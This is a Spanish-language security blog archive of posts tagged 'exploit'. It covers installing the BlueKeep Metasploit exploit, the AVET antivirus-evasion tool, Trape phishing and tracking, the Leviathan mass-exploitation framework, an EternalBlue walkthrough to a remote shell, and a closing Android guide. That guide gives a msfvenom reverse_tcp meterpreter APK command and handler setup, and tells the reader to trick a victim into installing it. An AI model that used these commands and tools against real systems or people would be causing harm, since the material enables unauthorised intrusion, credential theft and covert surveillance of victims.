Hacking Ético, Seguridad Informática, RedTeam, Pentesting.

Mostrando entradas con la etiqueta exploit. Mostrar todas las entradas
Mostrando entradas con la etiqueta exploit. Mostrar todas las entradas

miércoles, 23 de octubre de 2019

BLUEKEEP CVE-2019-0708 INSTALACIÓN Y USO


BlueKeep CVE-2019-0708


Metasploit lanzo hace días en un módulo de explotación pública inicial para CVE-2019-0708 , también conocido como BlueKeep, como una solicitud de extracción en Metasploit Framework. El módulo de explotación se dirige a las versiones de 64 bits de Windows 7 y Windows 2008 R2. El módulo se basa en el código de prueba de concepto de Metasploit contributor @ zerosum0x0 , quien también contribuyó con el módulo de escáner BlueKeep de Metasploit y los módulos de escáner y exploit para EternalBlue . El exploit de Metasploit utiliza una biblioteca mejorada de protocolos RDP de propósito general , así como capacidades mejoradas de huellas dactilares RDP, los cuales beneficiarán a los usuarios y contribuyentes de Metasploit mucho más allá del contexto del escaneo y la explotación de BlueKeep.
Como proyecto de código abierto, uno de los principios rectores de Metasploit es que el conocimiento es más poderoso cuando se comparte. El acceso democrático a las capacidades de los atacantes, incluidos los exploits, es fundamental para los defensores, especialmente aquellos que confían en herramientas de código abierto para comprender y mitigar el riesgo de manera efectiva.
Actualmente solo funciona en modo “manual”, lo que significa que necesita la interacción del usuario para ejecutarse correctamente.


INSTALACIÓN

Para agregar el exploit a Metasploit he usado y probado de dos maneras las cuales les detallare a continuación.

PRIMER MÉTODO

Antes de empezar asegurate de tener metasploit y tu Kali Actualizado.
Clonamos el repositorio que se encuentra en GitHub movemos los archivos a las siguientes carpetas. otra opción es descargarlos desde acá Link.

El archivo rdp.rb lo movemos a la siguiente ruta.
cp ./rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb    

El archivo rdp_scanner.rb lo movemos a la siguiente ruta.
cp./rdp_scanner.rb/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

El archivo cve_2019_0708_bluekeep.rb lo movemos a la siguiente ruta.
cp./cve_2019_0708_bluekeep.rb/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

El archivo cve_2019_0708_bluekeep_rce.rb lo movemos a la siguiente ruta.
cp./cve_2019_0708_bluekeep_rce.rb/usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Abrimos Metasploit y ejecutamos el siguiente comando y ya tendríamos el modulo y sus componentes instalado.

msf5> reload_all

SEGUNDO MÉTODO

Clonamos el repositorio de metasploit y abrimos la carpeta.
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework

Luego ejecutamos los siguientes comando para la configuración de dicho módulo.
git fetch origin pull/12283/head:bluekeep
git checkout bluekeep

Instalamos las dependencias necesarias.
gem install bundler && bundle

Si en el transcurso de la instalacion o configuracion sale error lo solucionamos con los siguientes comandos.
apt-get install libpq-dev
apt-get install libpcap-dev

ya con esto tendríamos instalado y configurado Metasploit y el módulo BlueKeep.

Nota: Si faltase alguna dependencia o herramienta extra instalarla manualmente.






 Video explotacion a sistema Windows 7  x64 


lunes, 22 de julio de 2019

AntiVirus Evasion Tool (AVET)

AntiVirus Evasion Tool  (AVET)


AVET es una herramienta de evasión de antivirus, que fue desarrollada para hacer la vida más fácil para los pentesters y para experimentar con técnicas de evasión de antivirus
Lo mismo se aplica también a otras cargas útiles como shellcode o dlls y otras técnicas.

  • al ejecutar un archivo ejecutable creado con msfpayload & co, el software antivirus a menudo reconocerá el archivo ejecutivo
  • Incluye una herramienta de evasión de antivirus que se dirige a máquinas de Windows con archivos ejecutables
  • diferentes tipos de cargas útiles se pueden utilizar ahora: shellcode, exe y dlls
  • Ahora se puede utilizar más técnicas, como la inyección de shellcode, el vacío de procesos y más
  • la mayoría de las cargas útiles se pueden entregar desde un archivo, la red o la línea de comandos
  • la carga útil se puede cifrar con una clave, la clave se puede entregar como cargas útiles
  • Este archivo Léame se aplica a Kali 2018.x (64bit) y tdm-gcc (también debería funcionar en otras versiones de Kali / Linux)

Presentado en Blackhat Arsenal 


Como Instalarlo

Clonamos el repositorio



abrimos la carpeta
cd avet

ejecutamos el archivo
./setup.sh




jueves, 7 de marzo de 2019

SuperNES - Super Nmap Easy Scanner


SuperNES - Super Nmap Easy Scanner

Es un escáner de seguridad de código abierto de Python que automatiza el proceso de escaneo de hosts y redes con las opciones más utilizadas de nmap. El propósito principal de SuperNES es hacer que las exploraciones sean fáciles y generar informes html de sus resultados.

SuperNES se basa en python2.7 y puede ejecutarse en la plataforma Linux que tiene un entorno Python y nmap instalado. Y necesita ser ejecutado como root.

Esta herramienta está diseñada para alguien sin experiencia, con poca experiencia o perezosa con nmap :) y sus opciones más utilizadas durante una prueba de penetración, por ejemplo, en cajas de HackTheBox, iHacklabs, etc. Siempre en entornos controlados.




Instalación:

Puede descargar la última versión de SuperNES clonando el repositorio de GitHub:

git clone https://github.com/RoberMB/SuperNES.git
cd SuperNES
python super_nes.py

Características:

v0.2 beta

Escaneo de ping

nmap -sn -oA ./results_SuperNES/ping_scan [IP o red]
Al final de la exploración se genera el informe html.
Escaneo de sigilo

nmap -sS -p [PORT] -oA ./results_SuperNES/stealth_scan [IP o red]
Al final de la exploración se genera el informe html.
Escaneo de versiones Stealth & Detect

nmap -sSV -O -p [PORT] -oA ./results_SuperNES/stealth_versions_scan [IP o red]
Al final de la exploración se genera el informe html.
Escaneo de la versión del sistema operativo

nmap -O -oA ./results_SuperNES/os_version_scan [IP o red]
Al final de la exploración se genera el informe html.
Exploración completa

nmap -sSV -A -T4 -p [PUERTO] -oA ./results_SuperNES/complete_scan [IP o red]
Al final de la exploración se genera el informe html.






domingo, 23 de septiembre de 2018

CEH V10 MÓDULOS, LABORATORIOS Y GUÍA DE EXAMEN

9/23/2018 11:31:00 a. m. Posted by Secpronet , , , , , , , , , 5 comments

CEH V10 MÓDULOS, LABORATORIOS Y GUÍA DE EXAMEN




Cambios con la actualización de CEH v10

La sensación general del examen sigue siendo muy similar a CEH v9, y la forma en que el examen evalúa las habilidades de un candidato no ha cambiado mucho. Algunos de los nuevos módulos que se han agregado incluyen:

Módulo de Evaluación de Vulnerabilidad
El material de evaluación de vulnerabilidad en la versión 9 de la CEH se ha ampliado y ahora tiene su propio módulo. La sección comprende herramientas, técnicas y metodología que se combinan para crear una mayor capacidad de evaluación de vulnerabilidad para los candidatos exitosos de CEH v10.

Módulo de análisis de malware
El Consejo de la CE añadió una sección sobre análisis de malware que enseña a los candidatos a explorar y analizar el malware. También enseña a los candidatos qué herramientas usar junto con el malware al realizar las pruebas.

Módulo IoT
El módulo IoT aborda temas como botnets y ataques DDoS, así como también cómo proteger una red de vulnerabilidades. Este es el último módulo agregado a la CEH, y es un claro indicador de la forma en que los dispositivos de IoT han encontrado su camino en el entorno empresarial moderno.

Ejercicios prácticos: CEH v10 ahora presenta módulos prácticos para que los candidatos dominen.

MÓDULOS:

Módulo 1: Introducción al Ethical Hacking
Módulo 2: Huellas y Reconocimiento
Módulo 3: Escaneo de redes
Módulo 4: Enumeración
Módulo 5: Análisis de Vulnerabilidades
Módulo 6: Hackeo de Sistemas
Módulo 7: Amenzas con Malware
Módulo 8: Sniffing
Módulo 9: Ingeniería social
Módulo 10: Denegación de servicio                      
Módulo 11: Secuestro de sesiones
Módulo 12: Evasión de IDS, firewalls y honeypots
Módulo 13: Hackeo de servidores web
Módulo 14: Hackeo de aplicaciones web
Módulo 15: Inyección SQL
Módulo 16: Hackeo de redes inalámbricas
Módulo 17: Hackeo de plataformas móviles
Módulo 18: Hackeo de IoT
Módulo 19: Computación en la nube
Módulo 20: Criptografía




jueves, 3 de mayo de 2018

Trape Busca Personas en Internet

5/03/2018 09:15:00 p. m. Posted by Secpronet , , , , , , , , No hay comentarios


TRAPE



Trape es una herramienta de reconocimiento que le permite rastrear personas, la información que puede obtener es muy detallada. Queremos enseñarle al mundo a través de esto, ya que las grandes compañías de Internet podrían monitorearlo, obteniendo información más allá de su IP.

Algunos beneficios

Una de sus funciones más atractivas es el reconocimiento remoto de sesiones. Puede saber dónde se ha conectado una persona, de forma remota. Esto ocurre a través de una derivación realizada en la misma política de origen (SOP). Actualmente puedes probar todo desde una interfaz web. (La consola, se convierte en una vista previa de los registros y acciones). El registro de las víctimas, las solicitudes entre otros datos se obtienen en tiempo real.
Si obtiene más información de una persona detrás de una computadora, puede generar un ataque más directo y sofisticado. Trape fue utilizado en algún momento para rastrear criminales y conocer su comportamiento.

  •          Puedes hacer ataques de phishing en tiempo real
  •          Ataques simples de enganche
  •          Cartografía
  •          Detalles importantes del objetivo
  •          Captura de credenciales
  •          Inteligencia de código abierto (OSINT)

Reconoce las sesiones de los siguientes servicios

  •          Facebook
  •          Gorjeo
  •          VK
  •          Reddit
  •          Gmail
  •          tumblr
  •          Instagram
  •          Github
  •          Bitbucket
  •          Dropbox
  •          Spotify
  •          PayPal
  •          Amazonas
  •          Foursquare (nuevo)
  •          Airbnb (nuevo)
  •          Hackernews (nuevo)
  •          Slack (nuevo)


Cómo usarlo

Primero descarga la herramienta.
cd trape
python trape.py –h

instalar las librerías que se localizan en el archivo requirements.txt pip install -r requirements.txt

ejemplo de uso

Example: python trape.py --url http://example.com --port 8080

En la opción --url debe poner el señuelo, puede ser una página de noticias, un artículo algo que sirve como página de presentación.

En la opción de puerto, simplemente colocas el puerto donde quieres que se ejecute.

En el directorio de Archivos, ubicado en la ruta: / static / files, aquí agrega los archivos con la extensión .exe o descarga los archivos enviados a la víctima.



domingo, 7 de enero de 2018

Leviathan-Framework

Leviathan-Framework


Que es:

Leviathan es un conjunto de herramientas de auditoría masiva que cuenta con un amplio rango de detección de servicios, fuerza bruta, detección de inyección SQL y ejecución de capacidades de explotación personalizadas. Consiste en herramientas de código abierto como masscan, ncrack, dsss y le ofrece la flexibilidad de usarlas con una combinación.

El objetivo principal de este proyecto es auditar tantos sistemas como sea posible en todo el país o en un amplio rango de IP.

Principales Características:

Discovery: descubre los servicios FTP, SSH, Telnet, RDP, MYSQL que se ejecutan dentro de un país específico o en un rango de IP a través de Shodan, Censys. También es posible descubrir manualmente los servicios en ejecución en un rango de IP mediante la herramienta integrada "masscan".

Discovery: descubre los servicios FTP, SSH, Telnet, RDP, MYSQL que se ejecutan dentro de un país específico o en un rango de IP a través de Shodan, Censys. También es posible descubrir manualmente los servicios en ejecución en un rango de IP mediante la herramienta integrada "masscan".

Ejecución remota de comandos: puede ejecutar comandos del sistema de forma remota en dispositivos comprometidos.

Explorador de inyección SQL: descubre vulnerabilidades de inyección SQL en sitios web con extensión de país específica o con tu Google Dork personalizado.

Explota vulnerabilidades específicas: Descubre objetivos vulnerables con Shodan, Censys o Masscan y explótalos en masa proporcionándote tu propio exploit o utilizando exploits preincluidos.

Herramientas integradas:

Masscan: es un escáner de puerto TCP muy rápido de Robert David Graham.  Leviathan utiliza Masscan para detectar servicios en un amplio rango de IP.

Ncrack: Ncrack es una herramienta de cracking de autenticaciónde red de alta velocidad. Leviathan utiliza ncrack para servicios de fuerzabruta como FTP, SSH, RDP, Telnet, MYSQL, etc.

DSSS (Damn Small SQLi Scanner): DSSS es un escáner devulnerabilidad de inyección SQL completamente funcional  y mínimo de Miroslav Stampar.  Leviathan usa DSSS para identificar vulnerabilidades de inyección SQL en URL específicas.


COMO SE INSTALA:

Lo primero que aremos es clonar el repositorio: Leviathan lo hacemos de la siguiente forma: 
git clone https://github.com/leviathan-framework/leviathan


ya una vez clonado instalaremos los requisitos o complementos que nos pide para poder ejecutarse bien lo hacemos de la siguiente forma: pip install -r requirements.txt 


Esperamos que termine de instalar todo lo necesario para funcione bien


ahora le daremos permiso con el siguiente comando: chmod +x leviathan.py y lo que faltaría es ejecutarlo y lo hacemos de la siguiente manera: ./leviathan.py


tenemos la herramienta completamente funcionando.








miércoles, 24 de mayo de 2017

Explotando la vulnerabilidad EternalBlue MS17-010


Explotando vulnerabilidad EternalBlue MS17-010


Afecta a :

Microsoft Windows Windows 8/2012 R2 (x64)

Nombre del módulo:

Exploit / ventanas / SMB / ms17_010_eternalblue

vamos a explotar: 
Entramos a metasploit y buscamos el módulo a usar.
use  Exploit / ventanas / SMB / ms17_010_eternalblue

Luego de esto veremos las opciones y las configuraremos. (como vemos lo único que modificaremos es el rhost lo demás lo dejamos así )
 
procedemos a lanzar el exploit

como vemos obtuvimos una shell remota ahora todo queda a nuestra iamaginación.


 

domingo, 8 de enero de 2017

Como vulnerar un dispositivo Android

1/08/2017 11:55:00 p. m. Posted by Secpronet , , , , , No hay comentarios
Vulnerar un dispositivo Android


Que tal esta vez les enseñaremos a vulnerar android.

primer paso: 
abriremos una terminal en Kali Linux y escribiremos lo siguiente:

msfvenom -p android/meterpreter/reverse_tcp LHOST = tu ip LPORT = puerto a la escucha R > /ruta donde lo guardaras/nombre.apk




Segundo Paso: 

Luego nos quedará el archivo del al siguiente manera:



Tercer Paso: 

Abrimos metasploit y lo configuramos de la siguiente manera:
use exploit/multi/handler
set payload andorid/meterpreter/reverse_tcp
set lhost tu_ip
set lport el puerto que colocaron en el archivo que se creo 
exploit (esto es para lanzar el ataque)



Cuarto Paso: 
Tenemos que mandarlo a nuestra victima y usando ingeniería social hacer que lo instale, una vez instalado se abrirá creara la sesión.




con esto ya tenemos acceso al sistema.


para mas comandos escriben Help.